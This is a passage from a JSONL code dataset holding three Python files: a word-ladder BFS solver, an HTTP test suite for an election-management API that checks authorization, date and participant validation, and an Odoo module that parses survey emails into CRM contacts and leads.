'''\n\n from collections import deque\n from copy import deepcopy\n\n\n dic = open(dictionary_file)\n dictionary = dic.read().split(\"\\n\")\n\n stack = [] \n stack.append(start_word) \n queue = deque() \n queue.append(stack) \n\n if start_word == end_word: \n return stack \n\n while len(queue) > 0: \n topstack = queue.pop() \n newdic=deepcopy(dictionary)\n\n for word in newdic: \n if _adjacent(word,topstack[-1]) is True: \n copystack = deepcopy(topstack) \n copystack.append(word) \n\n if word == end_word: \n return copystack \n\n queue.appendleft(copystack) \n dictionary.remove(word) \n return None\n\n\n\n\ndef verify_word_ladder(ladder):\n '''\n Returns True if each entry of the input list is adjacent to its neighbors;\n otherwise returns False.\n '''\n\n if len(ladder) == 0:\n return False\n for i in range(len(ladder)-1):\n if not _adjacent(ladder[i],ladder[i+1]):\n return False\n return True\n\n\n\ndef _adjacent(word1, word2):\n '''\n Returns True if the input words differ by only a single character;\n returns False otherwise.\n >>> _adjacent('phone','phony')\n True\n >>> _adjacent('stone','money')\n False\n '''\n\n if len(word1) != len(word2):\n return False\n x=0\n for i in range(len(word1)):\n if word1[i] != word2[i]:\n x = x + 1\n if x==1:\n return True\n else:\n return False\n", "sub_path": "word_ladder.py", "file_name": "word_ladder.py", "file_ext": "py", "file_size_in_byte": 2789, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "collections.deque", "line_number": 38, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 46, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "493983579", "text": "import sys;\n\nfrom dateutil import parser;\nfrom data import getElectionDuration;\nfrom data import getIndividuals;\nfrom data import getIndividualsAdded;\nfrom data import getParliamentaryElection;\nfrom data import getPoliticalParties;\nfrom data import getPoliticalPartiesAdded;\nfrom data import getPresidentialElection;\nfrom data import setIndividualsAdded;\nfrom data import setParliamentaryElectionAdded;\nfrom data import setPoliticalPartiesAdded;\nfrom data import setPresidentialElectionAdded;\nfrom data import updateParliamentaryElectionTimes;\nfrom data import updatePresidetialElectionTimes;\nfrom utilities import addParticipants;\nfrom utilities import setParticipantIds;\nfrom utilities import adminLogin;\nfrom utilities import areEqual;\nfrom utilities import copyDictionary;\nfrom utilities import equals;\nfrom utilities import setUpAddElectionData;\nfrom utilities import setUpAdminHeaders;\nfrom utilities import setUpUserHeaders;\nfrom utilities import setUpAuthorizationErrorRequest;\nfrom utilities import runTests;\n\n\ndef setUpIndividualElectionErrorTest ( withAuthentication, authenticationAddress, administratorAddress, individualIds, politicalPartyIds ):\n def setUpIndividualElectionErrorTestImplementation ( url, headers, data, files ):\n if (not getIndividualsAdded ( )):\n if (individualIds is None):\n addParticipants ( withAuthentication, authenticationAddress, administratorAddress, getIndividuals, setIndividualsAdded );\n else:\n setParticipantIds ( getIndividuals, setIndividualsAdded, individualIds );\n\n if (not getPoliticalPartiesAdded ( )):\n if (politicalPartyIds is None):\n addParticipants ( withAuthentication, authenticationAddress, administratorAddress, getPoliticalParties, setPoliticalPartiesAdded );\n else:\n setParticipantIds ( getPoliticalParties, setPoliticalPartiesAdded, politicalPartyIds );\n\n if (withAuthentication):\n adminLogin ( authenticationAddress, headers );\n\n ids = [individual[\"id\"] for individual in getIndividuals ( )] + [getPoliticalParties ( )[0][\"id\"]];\n\n data[\"participants\"].extend ( ids );\n\n return (url, \"\", False);\n\n return setUpIndividualElectionErrorTestImplementation;\n\ndef setUpParliamentaryELectionErrorTest ( withAuthentication, authenticationAddress, administratorAddress, individualIds, politicalPartyIds ):\n def setUpParliamentaryElectionErrorTestImplementation ( url, headers, data, files ):\n if (not getIndividualsAdded ( )):\n if (individualIds is None):\n addParticipants ( withAuthentication, authenticationAddress, administratorAddress, getIndividuals, setIndividualsAdded );\n else:\n setParticipantIds ( getIndividuals, setIndividualsAdded, individualIds );\n\n if (not getPoliticalPartiesAdded ( )):\n if (individualIds is None):\n addParticipants ( withAuthentication, authenticationAddress, administratorAddress, getPoliticalParties, setPoliticalPartiesAdded );\n else:\n setParticipantIds ( getPoliticalParties, getPoliticalPartiesAdded, politicalPartyIds );\n\n if (withAuthentication):\n adminLogin ( authenticationAddress, headers );\n\n ids = [party[\"id\"] for party in getPoliticalParties ( )] + [getIndividuals ( )[0][\"id\"]];\n\n data[\"participants\"].extend ( ids );\n\n return (url, \"\", False);\n\n return setUpParliamentaryElectionErrorTestImplementation;\n\ndef setUpPresidentialElectionTest ( withAuthentication, authenticationAddress, administratorAddress, individualIds ):\n def setUpPresidentialElectionTestImplementation ( url, headers, data, files ):\n if (withAuthentication):\n adminLogin ( authenticationAddress, headers );\n\n if (not getIndividualsAdded ( )):\n if (individualIds is None):\n addParticipants ( withAuthentication, authenticationAddress, administratorAddress, getIndividuals, setIndividualsAdded );\n else:\n setParticipantIds ( getIndividuals, setIndividualsAdded, individualIds );\n\n pollNumbers = setUpAddElectionData ( data, updatePresidetialElectionTimes, getPresidentialElection, getIndividuals );\n\n return (url, pollNumbers, False);\n\n return setUpPresidentialElectionTestImplementation;\n\n\ndef setUpParliamentaryElectionTest ( withAuthentication, authenticationAddress, administratorAddress, politicalPartyIds ):\n def setUpParliamentaryElectionTestImplementation ( url, headers, data, files ):\n if (withAuthentication):\n adminLogin ( authenticationAddress, headers );\n\n if (not getPoliticalPartiesAdded ( )):\n if (politicalPartyIds is None):\n addParticipants ( withAuthentication, authenticationAddress, administratorAddress, getPoliticalParties, setPoliticalPartiesAdded );\n else:\n setParticipantIds ( getPoliticalParties, setPoliticalPartiesAdded, politicalPartyIds );\n\n pollNumbers = setUpAddElectionData ( data, updateParliamentaryElectionTimes, getParliamentaryElection, getPoliticalParties );\n\n return (url, pollNumbers, False);\n\n return setUpParliamentaryElectionTestImplementation;\n\n\ndef createElectionRequestTest ( setElectionAddedFuntion ):\n def createElectionRequestTestImplementation ( pollNumbers, expectedResponse, receivedResponse ):\n assert \"pollNumbers\" in receivedResponse, \"Invalid response, field pollNumbers is missing.\"\n\n receivedPollNumbers = receivedResponse[\"pollNumbers\"];\n\n assert areEqual ( pollNumbers, receivedPollNumbers ), f\"Invalid response, expected {pollNumbers}, received {receivedPollNumbers}\";\n\n setElectionAddedFuntion ( True );\n\n return createElectionRequestTestImplementation;\n\ndef setUpGetElectionRequest ( withAuthentication, authenticationAddress, presidentialElectionStart, presidentialElectionEnd, parliamentaryElectionStart, parliamentaryElectionEnd ):\n def setUpGetElectionRequestTestImplementation ( url, headers, data, files ):\n if (withAuthentication):\n adminLogin ( authenticationAddress, headers );\n\n if ( presidentialElectionStart and presidentialElectionEnd and parliamentaryElectionStart and parliamentaryElectionEnd ):\n getPresidentialElection ( )[\"start\"] = presidentialElectionStart;\n getPresidentialElection ( )[\"end\"] = presidentialElectionEnd;\n getParliamentaryElection ( )[\"start\"] = parliamentaryElectionStart;\n getParliamentaryElection ( )[\"end\"] = parliamentaryElectionEnd;\n\n return (url, \"\", False);\n\n return setUpGetElectionRequestTestImplementation;\n\ndef getElectionsRequestTest ( setUpData, expectedResponse, receivedResponse ):\n assert \"elections\" in receivedResponse, \"Invalid response, field elections is missing.\";\n\n receivedElections = receivedResponse[\"elections\"];\n\n assert len ( receivedElections ) == 2, \"Invalid response, invalid number of elections.\";\n\n checked = [ ];\n\n for receivedElection in receivedElections:\n assert \"id\" in receivedElection, \"Invalid response, field id is missing.\";\n assert \"start\" in receivedElection, \"Invalid response, field start is missing.\";\n assert \"end\" in receivedElection, \"Invalid response, field end is missing.\";\n assert \"individual\" in receivedElection, \"Invalid response, field individual is missing.\";\n assert \"participants\" in receivedElection, \"Invalid response, field participants is missing.\";\n\n receivedStart = parser.isoparse ( receivedElection[\"start\"] );\n receivedEnd = parser.isoparse ( receivedElection[\"end\"] );\n receivedIndividual = receivedElection[\"individual\"];\n receivedParticipants = receivedElection[\"participants\"];\n\n election = getPresidentialElection ( ) if ( receivedIndividual == True ) else getParliamentaryElection ( );\n\n assert not (receivedElection[\"id\"] in checked), \"Invalid response, duplicate id.\"\n\n expectedStart = parser.isoparse ( election[\"start\"] );\n expectedEnd = parser.isoparse ( election[\"end\"] );\n expectedIndividual = election[\"individual\"];\n expectedParticipants = election[\"participants\"];\n\n assert expectedStart == receivedStart , f\"Invalid field start for election {receivedElection}, expected {expectedStart}, received {receivedStart}.\";\n assert expectedEnd == receivedEnd , f\"Invalid field end for election {receivedElection}, expected {expectedEnd}, received {receivedEnd}.\";\n assert expectedIndividual == receivedIndividual , f\"Invalid field individual for election {receivedElection}, expected {expectedIndividual}, received {receivedIndividual}.\";\n assert areEqual ( receivedParticipants, expectedParticipants ), f\"Invalid field participants for election {receivedElection}, expected {expectedParticipants}, received {receivedParticipants}.\";\n\n election[\"id\"] = receivedElection[\"id\"];\n\n checked.append ( election[\"id\"] );\n\ndef setUpOverallapingElectionsErrorTest ( withAuthentication, authenticationAddress, getElectionFunction, operation ):\n def setUpOverallapingElectionsErrorTestImplementation ( url, headers, data, files ):\n if (withAuthentication):\n adminLogin ( authenticationAddress, headers );\n\n election = getElectionFunction ( );\n\n copyDictionary ( data, election );\n\n start = parser.isoparse ( data[\"start\"] );\n end = parser.isoparse ( data[\"end\"] );\n duration = getElectionDuration ( );\n step = duration / 2;\n start = operation ( start, step );\n end = operation ( end, step );\n data[\"start\"] = start.isoformat ( );\n data[\"end\"] = end.isoformat ( );\n\n\n return (url, \"\", False);\n\n return setUpOverallapingElectionsErrorTestImplementation;\n\n\ndef runElectionTests ( administratorAddress, withAuthentication, authenticationAddress, individualIds, politicalPartyIds, presidentialElectionStart, presidentialElectionEnd, parliamentaryElectionStart, parliamentaryElectionEnd ):\n tests = [\n # create election authorization error\n [\"post\", \"/createElection\", setUpAuthorizationErrorRequest ( withAuthentication ) , { }, { }, { } , 401, { \"msg\": \"Missing Authorization Header\" }, equals, 1],\n [\"post\", \"/createElection\", setUpUserHeaders ( withAuthentication, authenticationAddress ) , { }, { }, { } , 401, { \"msg\": \"Missing Authorization Header\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { }, { } , 400, { \"message\": \"Field start is missing.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"\" }, { } , 400, { \"message\": \"Field start is missing.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \" \" }, { } , 400, { \"message\": \"Field end is missing.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \" \" , \"end\": \"\" }, { } , 400, { \"message\": \"Field end is missing.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \" \" , \"end\": \" \" }, { } , 400, { \"message\": \"Field individual is missing.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \" \" , \"end\": \" \" , \"individual\": False }, { } , 400, { \"message\": \"Field participants is missing.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \" \" , \"end\": \" \" , \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"202106-16T15:55:46+0100\" , \"end\": \" \" , \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"2021-06-16T1555460100\" , \"end\": \" \" , \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \" \" , \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \"202106-16T16:55:46+0100\" , \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \"2021-06-16T1655460100\" , \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"2021-06-16T16:55:46+0100\", \"end\": \"2021-06-16T15:55:46+0100\", \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid date and time.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \"2021-06-16T16:55:46+0100\", \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid participants.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpAdminHeaders ( withAuthentication, authenticationAddress ) , { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \"2021-06-16T16:55:46+0100\", \"individual\": False, \"participants\": [1] }, { } , 400, { \"message\": \"Invalid participants.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpIndividualElectionErrorTest ( withAuthentication, authenticationAddress, administratorAddress, individualIds, politicalPartyIds ) , { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \"2021-06-16T16:55:46+0100\", \"individual\": True , \"participants\": [] }, { } , 400, { \"message\": \"Invalid participants.\" }, equals, 1],\n [\"post\", \"/createElection\", setUpParliamentaryELectionErrorTest ( withAuthentication, authenticationAddress, administratorAddress, individualIds, politicalPartyIds ), { }, { \"start\": \"2021-06-16T15:55:46+0100\", \"end\": \"2021-06-16T16:55:46+0100\", \"individual\": False, \"participants\": [] }, { } , 400, { \"message\": \"Invalid participants.\" }, equals, 1],\n\n # get elections error\n [\"get\", \"/getElections\", setUpAuthorizationErrorRequest ( withAuthentication ) , { }, { }, { }, 401, { \"msg\": \"Missing Authorization Header\" }, equals, 1],\n [\"get\", \"/getElections\", setUpUserHeaders ( withAuthentication, authenticationAddress ), { }, { }, { }, 401, { \"msg\": \"Missing Authorization Header\" }, equals, 1],\n\n # create election\n [\"post\", \"/createElection\", setUpPresidentialElectionTest ( withAuthentication, authenticationAddress, administratorAddress, individualIds ) , { }, { }, { }, 200, { }, createElectionRequestTest ( setPresidentialElectionAdded ) , 5],\n [\"post\", \"/createElection\", setUpParliamentaryElectionTest ( withAuthentication, authenticationAddress, administratorAddress, politicalPartyIds ), { }, { }, { }, 200, { }, createElectionRequestTest ( setParliamentaryElectionAdded ), 5],\n\n # get elections\n [\"get\", \"/getElections\", setUpGetElectionRequest ( withAuthentication, authenticationAddress, presidentialElectionStart, presidentialElectionEnd, parliamentaryElectionStart, parliamentaryElectionEnd ), { }, { }, { }, 200, { }, getElectionsRequestTest, 4],\n\n # create election invalid dates\n [\"post\", \"/createElection\", setUpOverallapingElectionsErrorTest ( withAuthentication, authenticationAddress, getPresidentialElection, lambda time, step: time - step ) , { }, { }, { }, 400, { \"message\": \"Invalid date and time.\" }, equals, 2],\n [\"post\", \"/createElection\", setUpOverallapingElectionsErrorTest ( withAuthentication, authenticationAddress, getParliamentaryElection, lambda time, step: time + step ), { }, { }, { }, 400, { \"message\": \"Invalid date and time.\" }, equals, 2],\n ]\n\n for test in tests:\n test[1] = administratorAddress + test[1];\n\n percentage = runTests ( tests );\n\n return percentage;\n", "sub_path": "tests/electionTests.py", "file_name": "electionTests.py", "file_ext": "py", "file_size_in_byte": 19454, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "data.getIndividualsAdded", "line_number": 32, "usage_type": "call"}, {"api_name": "utilities.addParticipants", "line_number": 34, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 34, "usage_type": "argument"}, {"api_name": "data.setIndividualsAdded", "line_number": 34, "usage_type": "argument"}, {"api_name": "utilities.setParticipantIds", "line_number": 36, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 36, "usage_type": "argument"}, {"api_name": "data.setIndividualsAdded", "line_number": 36, "usage_type": "argument"}, {"api_name": "data.getPoliticalPartiesAdded", "line_number": 38, "usage_type": "call"}, {"api_name": "utilities.addParticipants", "line_number": 40, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 40, "usage_type": "argument"}, {"api_name": "data.setPoliticalPartiesAdded", "line_number": 40, "usage_type": "argument"}, {"api_name": "utilities.setParticipantIds", "line_number": 42, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 42, "usage_type": "argument"}, {"api_name": "data.setPoliticalPartiesAdded", "line_number": 42, "usage_type": "argument"}, {"api_name": "utilities.adminLogin", "line_number": 45, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 47, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 47, "usage_type": "call"}, {"api_name": "data.getIndividualsAdded", "line_number": 57, "usage_type": "call"}, {"api_name": "utilities.addParticipants", "line_number": 59, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 59, "usage_type": "argument"}, {"api_name": "data.setIndividualsAdded", "line_number": 59, "usage_type": "argument"}, {"api_name": "utilities.setParticipantIds", "line_number": 61, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 61, "usage_type": "argument"}, {"api_name": "data.setIndividualsAdded", "line_number": 61, "usage_type": "argument"}, {"api_name": "data.getPoliticalPartiesAdded", "line_number": 63, "usage_type": "call"}, {"api_name": "utilities.addParticipants", "line_number": 65, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 65, "usage_type": "argument"}, {"api_name": "data.setPoliticalPartiesAdded", "line_number": 65, "usage_type": "argument"}, {"api_name": "utilities.setParticipantIds", "line_number": 67, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 67, "usage_type": "argument"}, {"api_name": "data.getPoliticalPartiesAdded", "line_number": 67, "usage_type": "argument"}, {"api_name": "utilities.adminLogin", "line_number": 70, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 72, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 72, "usage_type": "call"}, {"api_name": "utilities.adminLogin", "line_number": 83, "usage_type": "call"}, {"api_name": "data.getIndividualsAdded", "line_number": 85, "usage_type": "call"}, {"api_name": "utilities.addParticipants", "line_number": 87, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 87, "usage_type": "argument"}, {"api_name": "data.setIndividualsAdded", "line_number": 87, "usage_type": "argument"}, {"api_name": "utilities.setParticipantIds", "line_number": 89, "usage_type": "call"}, {"api_name": "data.getIndividuals", "line_number": 89, "usage_type": "argument"}, {"api_name": "data.setIndividualsAdded", "line_number": 89, "usage_type": "argument"}, {"api_name": "utilities.setUpAddElectionData", "line_number": 91, "usage_type": "call"}, {"api_name": "data.updatePresidetialElectionTimes", "line_number": 91, "usage_type": "argument"}, {"api_name": "data.getPresidentialElection", "line_number": 91, "usage_type": "argument"}, {"api_name": "data.getIndividuals", "line_number": 91, "usage_type": "argument"}, {"api_name": "utilities.adminLogin", "line_number": 101, "usage_type": "call"}, {"api_name": "data.getPoliticalPartiesAdded", "line_number": 103, "usage_type": "call"}, {"api_name": "utilities.addParticipants", "line_number": 105, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 105, "usage_type": "argument"}, {"api_name": "data.setPoliticalPartiesAdded", "line_number": 105, "usage_type": "argument"}, {"api_name": "utilities.setParticipantIds", "line_number": 107, "usage_type": "call"}, {"api_name": "data.getPoliticalParties", "line_number": 107, "usage_type": "argument"}, {"api_name": "data.setPoliticalPartiesAdded", "line_number": 107, "usage_type": "argument"}, {"api_name": "utilities.setUpAddElectionData", "line_number": 109, "usage_type": "call"}, {"api_name": "data.updateParliamentaryElectionTimes", "line_number": 109, "usage_type": "argument"}, {"api_name": "data.getParliamentaryElection", "line_number": 109, "usage_type": "argument"}, {"api_name": "data.getPoliticalParties", "line_number": 109, "usage_type": "argument"}, {"api_name": "utilities.areEqual", "line_number": 122, "usage_type": "call"}, {"api_name": "utilities.adminLogin", "line_number": 131, "usage_type": "call"}, {"api_name": "data.getPresidentialElection", "line_number": 134, "usage_type": "call"}, {"api_name": "data.getPresidentialElection", "line_number": 135, "usage_type": "call"}, {"api_name": "data.getParliamentaryElection", "line_number": 136, "usage_type": "call"}, {"api_name": "data.getParliamentaryElection", "line_number": 137, "usage_type": "call"}, {"api_name": "dateutil.parser.isoparse", "line_number": 159, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 159, "usage_type": "name"}, {"api_name": "dateutil.parser.isoparse", "line_number": 160, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 160, "usage_type": "name"}, {"api_name": "data.getPresidentialElection", "line_number": 164, "usage_type": "call"}, {"api_name": "data.getParliamentaryElection", "line_number": 164, "usage_type": "call"}, {"api_name": "dateutil.parser.isoparse", "line_number": 168, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 168, "usage_type": "name"}, {"api_name": "dateutil.parser.isoparse", "line_number": 169, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 169, "usage_type": "name"}, {"api_name": "utilities.areEqual", "line_number": 176, "usage_type": "call"}, {"api_name": "utilities.adminLogin", "line_number": 185, "usage_type": "call"}, {"api_name": "utilities.copyDictionary", "line_number": 189, "usage_type": "call"}, {"api_name": "dateutil.parser.isoparse", "line_number": 191, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 191, "usage_type": "name"}, {"api_name": "dateutil.parser.isoparse", "line_number": 192, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 192, "usage_type": "name"}, {"api_name": "data.getElectionDuration", "line_number": 193, "usage_type": "call"}, {"api_name": "utilities.setUpAuthorizationErrorRequest", "line_number": 209, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 209, "usage_type": "name"}, {"api_name": "utilities.setUpUserHeaders", "line_number": 210, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 210, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 211, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 211, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 212, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 212, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 213, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 213, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 214, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 214, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 215, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 215, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 216, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 216, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 217, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 217, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 218, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 218, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 219, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 219, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 220, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 220, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 221, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 221, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 222, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 222, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 223, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 223, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 224, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 224, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 225, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 225, "usage_type": "name"}, {"api_name": "utilities.equals", "line_number": 226, "usage_type": "name"}, {"api_name": "utilities.equals", "line_number": 227, "usage_type": "name"}, {"api_name": "utilities.setUpAuthorizationErrorRequest", "line_number": 230, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 230, "usage_type": "name"}, {"api_name": "utilities.setUpUserHeaders", "line_number": 231, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 231, "usage_type": "name"}, {"api_name": "data.setPresidentialElectionAdded", "line_number": 234, "usage_type": "argument"}, {"api_name": "data.setParliamentaryElectionAdded", "line_number": 235, "usage_type": "argument"}, {"api_name": "data.getPresidentialElection", "line_number": 241, "usage_type": "argument"}, {"api_name": "utilities.equals", "line_number": 241, "usage_type": "name"}, {"api_name": "data.getParliamentaryElection", "line_number": 242, "usage_type": "argument"}, {"api_name": "utilities.equals", "line_number": 242, "usage_type": "name"}, {"api_name": "utilities.runTests", "line_number": 248, "usage_type": "call"}]} +{"seq_id": "390487217", "text": "# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Odoo\n# Copyright (C) 2018 iCode ().\n#\n##############################################################################\n\nfrom odoo import api, fields, models, tools, exceptions\nimport logging\nimport re\nimport lxml\nfrom collections import namedtuple\n\n_logger = logging.getLogger(__name__)\n\n\nclass EmailParser(models.AbstractModel):\n _name = 'mail.survey_parser'\n MappingRulesRecord = namedtuple(\n 'MappingRulesRecord', 'field_name, inner_field_name, field_type'\n )\n\n @staticmethod\n def _parse_mail_to_dict(message=\"\"):\n \"\"\"\n function receives the message and returns a dictionary\n :param message: string\n :return: dict fields_found[field_name] = field_val\n \"\"\"\n # FIXME: Test this \n message = lxml.html.fromstring(message).text_content()\n # message = message.replace('
', '')\n        # message = message.replace('
', '')\n message_list = list(map(lambda x: x.strip(), message.split('-----')))\n\n fields_found = {}\n for line in [item for item in message_list if ':' in item]:\n field_name, field_val = list(\n map(lambda x: x.strip(), line.split(':', 1))\n )\n fields_found[field_name] = field_val\n return fields_found\n\n\nclass EmailSurvey(models.TransientModel):\n _name = 'mail.survey_model'\n _inherit = ['mail.thread', 'mail.alias.mixin', 'mail.survey_parser']\n _description = 'Form Message Parser'\n _mail_post_access = 'read'\n\n def get_or_create_contact(self, w_dict, rel_model='res.partner'):\n \"\"\"\n The function accepts values,\n checks the presence of a contact,\n or creates a new one if there is none.\n \"\"\"\n try:\n contacts = self.env[rel_model].search([])\n filtered_contacts = contacts.filtered(lambda r: r.email == w_dict['email'])\n if filtered_contacts:\n _logger.info('Contact exist')\n return filtered_contacts\n else:\n _logger.info('Create contact')\n partner_init = {\n 'name': w_dict['name'],\n 'email': w_dict['email'],\n 'phone': w_dict['phone']\n }\n return self.env[rel_model].create(partner_init)\n except:\n _logger.info('Something wrong')\n\n @api.model\n def message_new(self, msg_dict, custom_values=None):\n \"\"\" Overrides mail_thread message_new that is called by the mailgateway\n through message_process.\n This override updates the document according to the email.\n \"\"\"\n _logger.info('Start mail parsing')\n\n TARGET_MODEL = custom_values.pop('target_model', None)\n\n write_dict = self._parse_mail_to_dict(msg_dict.get('body'))\n lead = None\n\n _logger.info(\"Survey mail data:\\n{}\\n\".format(write_dict))\n\n partner = self.get_or_create_contact(write_dict)\n try:\n _logger.info(\"Creation lead for {}\".format(partner.email))\n opportunity_data = {\n 'name': write_dict['message'],\n 'contact_name': write_dict['name'],\n 'team_id': False,\n 'description': 'Created from questionnaire form',\n 'partner_id': partner.id,\n 'partner_name': write_dict['company-name'],\n 'email_from': write_dict['email'],\n 'phone': write_dict['phone'],\n }\n leads = self.env[TARGET_MODEL].search([])\n filtered_leads = leads.filtered(\n lambda r: r.name == write_dict['message'] and r.stage_id.probability != 100.0)\n if write_dict['message'] in leads.mapped('name') and partner.id in leads.mapped(\n 'partner_id.id') and filtered_leads:\n _logger.info(\"Lead {} already exists\".format(\n opportunity_data['name']\n ))\n lead = filtered_leads\n else:\n lead = self.env[TARGET_MODEL].create(opportunity_data)\n _logger.info(\"Lead {} for {} successfully created\".format(\n opportunity_data['name'],\n partner.email\n ))\n except:\n _logger.exception(\n \"Lead creation for {} failed.\".format(partner.email)\n )\n return lead\n\n\nclass WebFormSurvey(models.TransientModel):\n _name = 'mail.survey_website_form'\n _inherit = 'mail.survey_model'\n _description = 'Website Form Parser'\n _mail_post_access = 'read'\n\n @api.model\n def message_new(self, msg_dict, custom_values=None):\n custom_values.update(\n {\n 'target_model': 'crm.lead'\n }\n )\n return super(WebFormSurvey, self).message_new(msg_dict, custom_values)\n", "sub_path": "models/mail_parser.py", "file_name": "mail_parser.py", "file_ext": "py", "file_size_in_byte": 5012, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "odoo.models.AbstractModel", "line_number": 18, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 18, "usage_type": "name"}, {"api_name": 